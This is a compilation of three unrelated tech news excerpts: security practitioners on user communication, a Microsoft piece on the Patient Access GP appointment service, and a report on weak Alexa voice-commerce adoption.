“We have all these tropes that we keep using over and over again, like, ‘Use a strong password, use a password manager,’ and stuff. And, sometimes, those are really tricky things to do,” Carhart said. “Have you ever tried to convert all of your passwords saved in a bunch of browsers to a password manager? That’s not an intuitive process. That’s really, really hard to do. So, I would like to see more end users tell their security people to go F themselves. Tell us when something is too hard.”

One reason users might not speak up, according to Wright, comes from social norms and users trying to be polite. This can lead to IT mistakes, because users aren’t willing to put themselves “in an uncomfortable situation” and ask questions regarding potential security incidents. 

“This is a very hard thing to fix. It’s a culture thing; it’s an education thing; it’s a training thing, where you have to make sure that people understand they have the power to make or break the security controls that you have in place,” Wright said.

She added later that this can happen because users don’t listen to their instincts. “If you don’t listen to that voice [in your head] … you might notice things, but you’re not going to pay attention them.”

Carhart added that even those with no security expertise should feel empowered to speak up and “realize that security isn’t magic. It’s something they can learn about.”

“I’m in industrial control systems now, and I’m dealing with a lot of eclectic legacy systems from the ’70s and ’80s. The people who know those systems the best are the guys or girls who have been there for 30 years. They might not know everything about security, but they could be very interested in it,” Carhart said. “I’d like, as a solution to that problem, to have users remember that they can contribute to security, and there are elements of knowledge that they bring to the table that we don’t have.”

Berlin noted that communication issues can also be a problem with red and blue teams, especially if those teams aren’t paired up.

“It’s a really big problem when it comes to doing defensive stuff, because we can’t fix what we don’t know is broken, especially when you’re a contractor or an MSSP, because you don’t know the networks and everything that they have internally, as well as the red teamer that broke in or their internal team,” Berlin said.

Go to Original Article

No one likes waiting on the phone for a GP appointment. So why do we still do it?

The team behind the services are experts at healthcare, as they also run Patient.Info, one of the most popular medical websites in the UK. More than 100 million people logged on to the site in 2018 to read articles about healthcare, check symptoms and learn to live a healthier life, and more than 60% of GPs in England have access to it.

They also produce a newsletter that’s sent to 750,000 subscribers and around 2,000 leaflets on health conditions and 850 on medicines.

People can access Patient.Info 24 hours a day, seven days a week. It’s the same for Patient Access but web traffic spikes every morning when people want to book appointments to see their GP. To handle that demand, Patient Access runs on Microsoft’s Azure cloud platform. As well as being reliable and stable, all patient data is protected by a high level of security – Microsoft employs more than 3,500 dedicated cybersecurity professionals to help protect, detect and respond to threats, while segregated networks and integrated security controls add to the peace of mind.

“About 62% of GP practices use Patient Access,” says Sarah Jarvis MBE, the Clinical Director behind the service. “They’re using it to manage their services, manage appointments, take in repeat medications, consolidate a patient’s personal health record and even conduct video consultations.

“Just imagine your GP being able to conduct video consultations. If you’re aged 20 to 39 you might not want or need to have a relationship with a GP because you don’t need that continuity of care.

“But imagine you are elderly and housebound, and a district nurse visits you. They phone your GP and say: ‘Could you come and visit this patient’, but the GP is snowed under and can’t get there for a couple of hours. The district nurse is also very busy and must visit someone else.

“Now, with Patient Access, a Duty Doctor can look at someone’s medical record and do a video consultation in five minutes. If the patient needs to be referred, the GP can do it there and then from inside the system. The possibilities are endless, and older people, especially, have so much to gain from this.”

Go to Original Article
Author: Microsoft News Center

Report on Alexa-enabled devices puts spotlight on voice commerce

Will voice commerce catch on? It hasn’t yet, according to a new report by The Information, but experts said that won’t slow the growth of voice computing.

According to the report, which cites two people briefed on Amazon’s internal figures, only about 2% of the people who own Alexa-enabled devices — mainly Amazon’s Echo line of speakers — have made a purchase with their voices so far in 2018. Of the people who did buy something using Alexa voice shopping, about 90% didn’t try it again, the report states.

An Amazon spokesperson disputed the figures presented in The Information, but previous reports also conveyed less-than-stellar numbers when it comes to consumers using smart speaker devices for voice commerce. The Information’s numbers also jibe with a report released last fall by technology consulting firm Activate that found the majority of smart speaker owners use their devices for relatively simple functions like playing music, getting the weather or setting alarms. In fact, shopping wasn’t even on the list of things users said they do with their devices.

Zeus Kerravala, founder and principal analyst at ZK ResearchZeus Kerravala

“I’m not surprised,” said Zeus Kerravala, founder and principal analyst at ZK Research. “I think voice has a lot of potential; I just think there’s a lot of trust issues around it right now. It’s not dissimilar to what happened with online purchasing. A lot of people were cautious with that until they tried it a couple of times and they gained some confidence in it.”

Julie Ask, principal analyst at ForresterJulie Ask

Beyond that, using voice alone to shop is simply not practical, said Julie Ask, principal analyst at Forrester.

“It’s simply too hard [to purchase things via voice only] beyond replenishment of simple goods,” Ask said. “There are easier ways to buy. It’s hard to browse, you can’t see images and you can’t realistically listen to product descriptions — and who would want to.”

She added that although Amazon is number one in market share, retailers are wary of partnering with the company, which could also have played a role in the lackluster figures on shopping via Alexa-enabled devices.

Voice in the enterprise

Given all that, should the enterprise back off from pursuing voice computing? Not at all, said Werner Goertz, research director at Gartner. Just because “mom and pop” are not buying goods through Alexa-enabled devices today doesn’t say much about the value of the voice AI category as a whole — or about  consumer shopping habits going forward. Voice commerce will undoubtedly evolve, he said, and, in any case, people’s current disinclination to use Alexa-enabled devices for shopping shouldn’t dissuade CIOs from investing in voice computing.

Companies are definitely trying to reinvent brand experience and they’re doing that with smart speakers and with multimodal voice interactions as well.
Werner Goertzresearch director, Gartner

Goertz said there will be an organic growth in e-commerce capabilities and usage, with the hospitality industry, restaurants and chain stores already developing proofs of concepts and use cases that incorporate different transactions using voice AI technology.

An example Goertz gave was Amazon partnering with Marriott International to start bringing Amazon Echo smart speakers into hotels as part of the tech giant’s Alexa for Hospitality initiative. Hotel guests will be able to use the Alexa-enabled devices to order room service, call for more towels, order entertainment and more.

“Companies are definitely trying to reinvent brand experience and they’re doing that with smart speakers and with multimodal voice interactions as well,” Goertz said.

By multimodal voice interactions, Goertz means voice assistants with screens, like Amazon’s Echo Show. He said these kinds of devices lend themselves better to functions like voice commerce — and alleviate some of the issues with voice-only shopping raised by Forrester’s Ask.

Gartner analyst Ranjit Atwal agreed that multimodal voice devices using voice, video, chat and screens will eventually allow for more frequent and complex purchases — and a more integrated customer experience — but admits there’s still “a long way to go” for voice commerce.

As Kerravala said, “I think there will be a day when voice is the dominant interface … we just need to take baby steps in getting there.”

What’s the takeaway for CIOs, according to Ask?

“CIOs should use [voice technology] and pilot it, but in scenarios that make sense — easy information retrieval, control, et cetera,” she said. “Don’t stretch it beyond what it does easily.”